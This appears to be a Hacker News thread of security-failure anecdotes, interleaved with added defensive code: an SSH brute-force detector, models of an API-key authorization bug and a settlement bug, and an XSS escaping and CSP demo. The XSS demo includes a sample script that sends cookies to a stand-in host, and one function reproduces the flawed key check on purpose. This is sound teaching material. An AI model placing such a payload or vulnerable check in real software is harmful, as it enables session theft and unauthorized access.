HACKER Q&A
📣 jdthedisciple

Real-life, ridiculous security incidents?


I was reading some of the comments in this submission about attackers trying to brute force ssh credentials.

https://news.ycombinator.com/item?id=36169954

In the comments fellow HN'ers were discussing the possibilities of XSS attacks using the password.

This had me thinking, have there actually been such successful attacks in your experience and how regular are they? Think of some kind of ridiculous XSS attack or anything similar.

Are these still successfully happening in 2023?


👤 e1g Accepted Answer ✓
Big fails from small things are common. A few recent examples off the top of my head -

  1. Bing.com had an issue whereby attackers could inject XSS code to all visitors, due to a simple misconfiguration in Azure.
  2. Visual Studio Code had a Remote Code Execution vulnerability triggered by a simple link.
  3. LastPass had all of its secrets and backups taken via a compromised developer's machine.
  4. CircleCI was breached and leaked everyone's OAuth tokens and secrets by malware.
  5. Heroku and Okta were breached due to a compromised token, had their source code taken, and potentially leaked customer secrets.

[1] https://www.wiz.io/blog/azure-active-directory-bing-misconfi...

[2] https://github.com/google/security-research/security/advisor...

[3] https://blog.lastpass.com/2023/03/security-incident-update-r...

[4] https://circleci.com/blog/january-4-2023-security-alert/

[5] https://status.heroku.com/incidents/2413 https://www.bleepingcomputer.com/news/security/oktas-source-...


👤 sickcodebruh
I discovered a SQL injection vulnerability in the credit card rewards site of a major US bank in 2011. A VP finally called me a day later and asked what I wanted — they thought I was a hacker trying to extort them, he told me they had been in meetings all day about it. They didn’t bother looking up my information to see that I had been an account holder for more than ten years.

The site was down for a few months while I assume they fixed and audited the whole product. They never told customers what happened.


👤 blakesterz
Maybe not exactly what you're thinking, but the ol' Vegas fish tank hack always comes to mind when I think of ridiculous hacks:

Casino Gets Hacked Through Its Internet-Connected Fish Tank Thermometer

https://thehackernews.com/2018/04/iot-hacking-thermometer.ht...


👤 seanhunter
The most terrifying one I've ever heard of was a major global bank[1] who received a call from a national telco about a bill for a leased line to one of their data centers that had been unpaid for 6 months. They had no records of this line.

The attacker had managed to get an unmonitored physical connection installed directly in their data center and was able to exfiltrate data completely without any limitation other than bandwidth for 6 months without detection.

This story was never reported as far as I know.

[1] I'm not going to name them but if the name came out I don't think anyone would be surprised who it was.


👤 hoofhearted
LastPass got taken down because they allowed a developer to work remote from their home on their own personal PC. That PC had an unpatched vulnerability within the version of Plex that the user was running.

Some hackers got into their machine on a basic hack, and then hung around long enough to poke around and find the Plex vulnerability.

They were able to inject their own code into the vulnerable Plex, and then ran a basic keylogger in the background without their knowledge.

At that point, they watched the user type in their LastPass admin credentials, and at that point they had the keys to the kingdom because LastPass didn’t have better auth protection.

Many layers of the onion failed here which added up to a Swiss cheese effect. The hacks were very elementary, and nothing compared to something like Stuxnet or the NSO hacks.


👤 rograndom
Many, many years ago I was at a company where a manager (M1) wanted full root access to all of the internal servers (mostly file/web servers, router/firewall and the mail server). It's lost to the sands of time as to why, but he was persistent.

There was quite a bit of back and forth between the team that managed the servers, the owners of the company and M1. After a few weeks M1 was finally given access. Within a couple of days he brought a complaint against another manager (M2) that M2 had hijacked M1's personal email and was storing it on one of the internal servers.

Meetings were held into the night to discuss what should be done. M2 was called in, credentials revoked and they were placed on leave while an investigation could take place. Overnight every single server was compromised and no one could get into anything.

M2 brought in a lawyer, the company brought in a lawyer and all of management and most of the employees were sat down in a room to figure out what to do about this mess.

Turns out M1 had re-used the same "password", which was a single lowercase English word, on EVERYTHING. His personal email, any account on any service maintained by the company, and had changed his secure password on the superuser accounts he had just been given to the same one.

There was a literal paper trail of M1 providing this password to the majority of the people in the company. Provided in printed memos asking to have accounts set up, emails asking to have accounts set up, other people having it on the standard sticky note on monitors, M1 saying "and make the password..." in the common workspace for anyone to overhear, etc etc.

Of course, one of the servers had SSH open for remote access... and you can see where this is going.

An expensive forensics team was brought in, servers recovered, and it was determined that M1's account on the SSH server was targeted by automated logins not too long after he was added to the company's website.

M2 was cleared and brought back; M1 had their role decreased and was gone not long after.
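
The story above ends with automated logins hammering one SSH account. As an added example (not code from the poster), here is the kind of detection a defender would run over sshd log lines: it flags a source that fails a password several times in a short window, and flags the worse case of an `Accepted` login arriving from a source that was just bursting. The log lines are constructed samples in syslog format with documentation-range IPs, and the year 2023 is assumed for timestamp parsing.

```python
"""Added detection example: brute-force bursts in sshd logs, plus a
successful login from a source that was bursting moments earlier.
All log lines below are constructed samples, not real system logs."""
import re
from collections import defaultdict, deque
from datetime import datetime

SAMPLE_LOG = """\
Jun 04 02:10:01 files sshd[4011]: Failed password for invalid user admin from 203.0.113.5 port 50210 ssh2
Jun 04 02:10:03 files sshd[4013]: Failed password for m1 from 203.0.113.5 port 50212 ssh2
Jun 04 02:10:04 files sshd[4015]: Failed password for m1 from 203.0.113.5 port 50214 ssh2
Jun 04 02:10:06 files sshd[4017]: Failed password for m1 from 203.0.113.5 port 50216 ssh2
Jun 04 02:10:08 files sshd[4019]: Failed password for m1 from 203.0.113.5 port 50218 ssh2
Jun 04 02:10:09 files sshd[4021]: Accepted password for m1 from 203.0.113.5 port 50220 ssh2
Jun 04 09:30:00 files sshd[5102]: Failed password for alice from 198.51.100.7 port 40001 ssh2
Jun 04 09:30:20 files sshd[5104]: Accepted publickey for alice from 198.51.100.7 port 40002 ssh2
"""

# Matches both "Failed password for invalid user X" and "Accepted publickey for X".
LINE_RE = re.compile(
    r"^(?P<ts>\w{3} \d{2} \d{2}:\d{2}:\d{2}) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) (?P<method>password|publickey) for "
    r"(?:invalid user )?(?P<user>\S+) from (?P<ip>\S+) port \d+"
)


def parse_events(text, year=2023):
    """Parse syslog-style sshd lines into (timestamp, result, method, user, ip).
    Syslog lines carry no year, so one is assumed."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
        events.append((ts, m["result"], m["method"], m["user"], m["ip"]))
    return events


def detect(events, threshold=4, window_seconds=60):
    """Sliding-window check per source IP.

    Returns (bursting_ips, suspicious_logins):
      bursting_ips      - sources with >= threshold failures inside one window
      suspicious_logins - (user, ip, method) for an Accepted login from a
                          source that was bursting at that moment
    """
    recent = defaultdict(deque)  # ip -> timestamps of failures still in the window
    bursting = set()
    suspicious = []
    for ts, result, method, user, ip in sorted(events):
        q = recent[ip]
        while q and (ts - q[0]).total_seconds() > window_seconds:
            q.popleft()  # expire failures older than the window
        if result == "Failed":
            q.append(ts)
            if len(q) >= threshold:
                bursting.add(ip)
        elif result == "Accepted" and len(q) >= threshold:
            suspicious.append((user, ip, method))
    return bursting, suspicious


if __name__ == "__main__":
    bursting, suspicious = detect(parse_events(SAMPLE_LOG))
    print("bursting sources:", bursting)
    print("logins after a burst:", suspicious)
```

A single failed password followed by a key-based login (the `alice` lines) stays quiet; the `m1` sequence is flagged twice, once for the burst and once for the password login that followed it, which is the signal worth paging on.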


👤 freitzkriesler2
An employer I worked for would allow you to reset anyone's passwords by calling the help desk, providing their username, and their direct manager.

I told the CISO this and she asked how a bad actor would figure this out; I said LinkedIn. She didn't seem pissed, so I laughed and 5 minutes later reset her password and sent an email to herself as proof.

That policy changed quick...


👤 georgdangl
I've got two. The first one is a bit older, from around 2015. It was a small platform that did have a Java Web Start app for some features. It downloaded an app, where you were automatically logged in. However, when downloading it, I noticed that there was no secret or anything transferred, just your username. Turns out, the downloaded application contained a database connection string with full owner rights. As far as I know, that was never fixed.

The second one was a bit more severe, and happened just last year. At our company, we're using a service to host private package feeds for some libraries we're selling. Users get their own account, and usually use an API key authentication to get the packages. However, we've discovered that one client, although a paying customer, didn't have proper rights assigned to their account. After contacting them, it turned out they could access everything just fine, and never noticed a problem. They did have their own user account, along with their own API key. However, for the actual authentication, they used _their_ API key with _my_ account name, and that worked. The service was first checking if the API key was a valid one (which it was, for some account without any access rights), and then checked if the user did have access (which it did). But there was no check whether the API key actually belonged to the user account. So, with publicly available information (account names) and a free account to generate API keys, you could essentially access any private packages you wanted. That one was a bit more scary, and took half a year and multiple emails to finally get resolved.
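
The second story describes a classic missing-binding bug: the service checked "is this API key valid?" and "does the named account have access?" as two independent questions. As an added example (not the poster's code or the service's), here is a constructed model of that check order beside the fixed version, where the identity is derived from the key and the client-supplied account name is only confirmed against it. Account names, keys and feed names are invented sample data.

```python
"""Constructed model of the package-feed authorization bug described above.
Accounts, API keys and feed names are invented; no real service is modelled."""
from dataclasses import dataclass, field


@dataclass
class Account:
    name: str
    feeds: set = field(default_factory=set)  # feeds this account may read


# Constructed sample data: a paying vendor account and a free account.
ACCOUNTS = {
    "vendor-account": Account("vendor-account", {"private-feed"}),
    "free-account": Account("free-account", set()),
}
# API key -> owning account name (constructed keys, not real secrets).
API_KEYS = {
    "key-of-vendor": "vendor-account",
    "key-of-free-user": "free-account",
}


def authorize_vulnerable(account_name, api_key, feed):
    """Reproduces the flawed order of checks: key validity and account
    permissions are tested independently, never against each other."""
    if api_key not in API_KEYS:  # step 1: is the key a known key at all?
        return False
    account = ACCOUNTS.get(account_name)
    if account is None:
        return False
    return feed in account.feeds  # step 2: does the *claimed* account have access?


def authorize_fixed(account_name, api_key, feed):
    """Hardened version: the key decides who the caller is; the account name
    in the request is accepted only if it matches the key's owner."""
    owner = API_KEYS.get(api_key)
    if owner is None or owner != account_name:
        return False  # unknown key, or key does not belong to the claimed account
    return feed in ACCOUNTS[owner].feeds


if __name__ == "__main__":
    # A free account's key presented with the vendor's public account name.
    print("vulnerable:", authorize_vulnerable("vendor-account", "key-of-free-user", "private-feed"))
    print("fixed:     ", authorize_fixed("vendor-account", "key-of-free-user", "private-feed"))
```

The general rule the fix applies: never look up permissions by an identifier the client chose; resolve the principal from the credential and treat any client-supplied identity as, at most, a value to compare against.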


👤 linuxandrew
My story is more of a facepalm since there was no known hack that came of it.

My former employer had a helpdesk website that was written in Perl 4 in the '90s by some interns. The users' passwords were stored in plaintext in /var/www under a subdirectory. Anyone who guessed the URL could have stolen those passwords and accessed a trove of information and data of some of the biggest financial institutions.

My coworker and I patched it up as much as we could (2018-20), upgraded it from RHEL 4 to 7/8, Perl 5, fixed the public password issue, and flagged it with management but it largely fell onto deaf ears at the time.

I am still amazed at how blatantly incompetent and reckless some companies are.


👤 bombcar
Log4j was kinda like that, abusing the logging.

Lately there’s been a number of hacks of smaller websites using methods of exfiltrating the session cookie via XSS or otherwise injecting malicious scripting (imagine if HN let you upload a script as a comment by accident, or would allow a script uploaded as a jpg).


👤 dementik
As someone shared their findings with some bank related case, I'd like to share mine:

Approx 15 years ago I was installing a POS system at a second-hand store. It was just the beginning of online authorizations and there were a few issues with the reliability of those at the time. As testing was hard, I usually tested operations by trying to make a 10kEUR transaction with my expired Visa Electron card. If it worked correctly, I got a "denied" response back. It was some time in November when the installation happened. I tested transactions and those went through as approved. I canceled the transaction and the cancel went through also. After a few tests we found out that the payment terminal had some weird demo credentials and finally we got that fixed.

Then, the shop finally opened in January. The shop owner called me and said their bank account now had a negative balance. I joked something about why he was calling me about that and forgot the thing for a few days. Then, after a few days, he called me again and said they had started a police investigation about the fraud. On the same evening, I was paying my personal bills and noticed that I had about 65kEUR too much money in my account. I immediately sent a message to the store owner that I probably had his money but did not know why.

Well, the next day I was a suspect of fraud. I started to move the money back to the customer, but for some reason it was not possible in one tx; it was limited to 10kEUR/day. So it took like a week until the customer had their money back.

So what happened: Normally payment terminal transactions expired after three months, meaning that the bank would reject a batch that included older ones. That was not the case here, as there was an exception: if the same transaction had a cancel transaction in the same batch, then it was accepted. But in some later process, they rejected all the normal transactions but accepted the cancels.

So there was a real bug in some bank system, and the bank tried to force me to sign an NDA that I would not tell about this issue. I did not see any reason to sign that, but most probably they fixed it very soon.
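
The settlement bug the poster reconstructs is a reconciliation failure: one stage admits a stale sale because its cancel is in the same batch, a later stage drops the stale sale but posts the cancel anyway, and the merchant is debited for money that was never credited. As an added example (not the poster's code, and not any bank's), here is a constructed model of both stages beside a fixed settlement that only posts a cancel when the sale it reverses was posted. Dates, amounts and transaction ids are invented.

```python
"""Constructed model of the batch-settlement bug described above.
Transactions, dates and amounts are invented sample data."""
from datetime import datetime, timedelta

# Constructed batch: a stale test sale, its cancel, and one genuine fresh sale.
NOW = datetime(2009, 1, 20)
BATCH = [
    {"id": "t1", "kind": "sale", "amount": 10000, "created": datetime(2008, 10, 1), "voids": None},
    {"id": "t2", "kind": "void", "amount": 10000, "created": datetime(2008, 10, 1), "voids": "t1"},
    {"id": "t3", "kind": "sale", "amount": 250, "created": datetime(2009, 1, 19), "voids": None},
]


def is_stale(tx, now, max_age):
    return now - tx["created"] > max_age


def settle_buggy(batch, now, max_age=timedelta(days=90)):
    """Two stages as described: intake keeps a stale sale because a cancel
    for it sits in the same batch; posting then drops every stale sale but
    posts every cancel without looking at what it reverses."""
    intake = [
        tx for tx in batch
        if tx["kind"] == "void"
        or not is_stale(tx, now, max_age)
        or any(v["kind"] == "void" and v["voids"] == tx["id"] for v in batch)
    ]
    return [tx for tx in intake if tx["kind"] == "void" or not is_stale(tx, now, max_age)]


def settle_fixed(batch, now, max_age=timedelta(days=90)):
    """A cancel is posted only when the sale it reverses was posted in the
    same settlement with a matching amount; orphaned cancels are rejected."""
    posted = [tx for tx in batch if tx["kind"] == "sale" and not is_stale(tx, now, max_age)]
    posted_sales = {tx["id"]: tx for tx in posted}
    for tx in batch:
        if tx["kind"] == "void":
            original = posted_sales.get(tx["voids"])
            if original is not None and original["amount"] == tx["amount"]:
                posted.append(tx)
    return posted


def merchant_net(posted):
    """Signed change to the merchant's balance: sales credit, cancels debit."""
    return sum(tx["amount"] if tx["kind"] == "sale" else -tx["amount"] for tx in posted)


if __name__ == "__main__":
    print("buggy settlement net:", merchant_net(settle_buggy(BATCH, NOW)))
    print("fixed settlement net:", merchant_net(settle_fixed(BATCH, NOW)))
```

The invariant the fix enforces is simple to state and cheap to check at the end of any settlement run: the set of posted cancels must be a subset of the set of posted sales they reference. A negative net for a batch that contained no refunds is the alarm a reconciliation job should raise before anything is booked.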


👤 ransom1538
The most underrated hack IMHO: Hacking Jenkins - Orange Tsai https://www.youtube.com/watch?v=_x8BsBnQPmU

I have seen videos of people cruising other companies' Jenkins dashboards. It is horrifying; people put all kinds of keys into Jenkins. Thousands of companies are rooted. Jenkins makes WordPress look like modern secure software.

on and on, https://www.trendmicro.com/vinfo/pl/security/news/cybercrime...


👤 spcebar
Credit card skimming using XSS vulnerabilities is a pretty common attack, even in 2023. If someone can get a two line script on a checkout page, they can steal everything you type in.
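
Both bombcar's point about session cookies leaving via XSS and the checkout-page skimming above come down to the same two server-side controls: render user-controlled text as text, and make the things a script would steal unreachable. As an added example (not code from either poster), the block below renders a constructed search query with and without escaping, marks the session cookie `HttpOnly` so `document.cookie` cannot expose it, and builds a Content-Security-Policy for a checkout page that refuses inline script. The query string, cookie value and host name are invented.

```python
"""Added example: escaping, HttpOnly cookies and a checkout-page CSP.
The sample query, token and host below are constructed, not real."""
from html import escape

# Constructed sample of the kind of string that might arrive in a search URL.
SAMPLE_QUERY = '"><script>fetch("https://example.invalid/?c=" + document.cookie)</script>'


def render_vulnerable(query):
    """String interpolation straight into HTML: the browser runs the input."""
    return f'<p>Results for "{query}"</p>'


def render_safe(query):
    """Escaping turns <, >, & and quotes into entities, so the browser shows
    the text instead of parsing it as markup."""
    return f'<p>Results for "{escape(query, quote=True)}"</p>'


def contains_script_tag(html):
    """Cheap output check used here to show the difference between the two renderers."""
    return "<script" in html.lower()


def session_cookie_header(token):
    """HttpOnly keeps document.cookie from exposing the session token even if
    a script does run; Secure and SameSite limit where the cookie is sent."""
    return f"Set-Cookie: session={token}; HttpOnly; Secure; SameSite=Lax; Path=/"


def checkout_csp_header(allowed_script_hosts):
    """Only scripts from the page's own origin and the listed hosts may run.
    Without 'unsafe-inline', an injected <script> block is refused by the browser."""
    sources = " ".join(["'self'", *allowed_script_hosts])
    return (
        f"Content-Security-Policy: default-src 'self'; script-src {sources}; "
        f"object-src 'none'; base-uri 'self'"
    )


if __name__ == "__main__":
    print(render_vulnerable(SAMPLE_QUERY))
    print(render_safe(SAMPLE_QUERY))
    print(session_cookie_header("constructed-token-value"))
    print(checkout_csp_header(["https://payments.example"]))
```

Escaping is the fix for the bug itself; the cookie flags and the CSP are the layers that limit the damage when the next missed escape ships, which on a checkout page is exactly the two-line script the poster describes.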

👤 throwaway202351
Not necessarily a malicious attack, and pre-covid, but I was able to get into my "secured" office building by just tailgating or waving to the security guard, even though we're supposed to check our badges with them every day.

👤 1MachineElf
Back in 2014, I was trying to scrape a flash-based webpage for my employer and discovered a random XML file being downloaded by the webpage. Inside it was a commented-out admin username and password. My employer instructed me to try the credentials and they worked... I can't say what the webpage was or whose data was compromised, but for sure there were a lot of fortune x00 and other institutions you've heard of inside there.

👤 RA2lover
A few years back, a game (Racecraft from Sandbox Games) had client log files point to an admin control panel behind a login page... whose login form had valid credentials inserted into it as default values.

👤 AnimalMuppet
I worked for an internet security company that shall remain nameless. We had a virus outbreak because the company president opened an email attachment.

👤 rhtgrg
No, they aren't happening. Everybody is sanitizing all of their user inputs against all possible vectors and when administrators visit such user generated content and their cookies just happen to expire at that moment, they just enter their password into the dialog securely and go about their day. Their password does not grant any sort of elevated privilege to any systems.

Stop ruminating on such ridiculous fantasies and occupy your mind with something productive instead.


👤 throwawayadvsec
found an XSS on Metacritic.com a few months ago in their search results URL

didn't expect a site that big to have this kind of weakness going unnoticed for years


👤 aaron695
UPS had this XSS in mid 2021 -

https://www.bleepingcomputer.com/news/security/phishing-camp...

What is a "ridiculous security incident", is it something you think is easy after someone explains to you what happened after it happens in a void without the business logic and workplace dynamics?

Or something silly like XSS in passwords from known hackers?

This is funny especially because of the quote they managed to get, graffiti artists graffitiing anti-graffiti QR codes with pro-graffiti videos -

Melbourne Lord Mayor says 'vandalism' of QR codes for reporting graffiti 'so frustrating' - https://www.abc.net.au/news/2023-01-01/melbourne-lord-mayor-...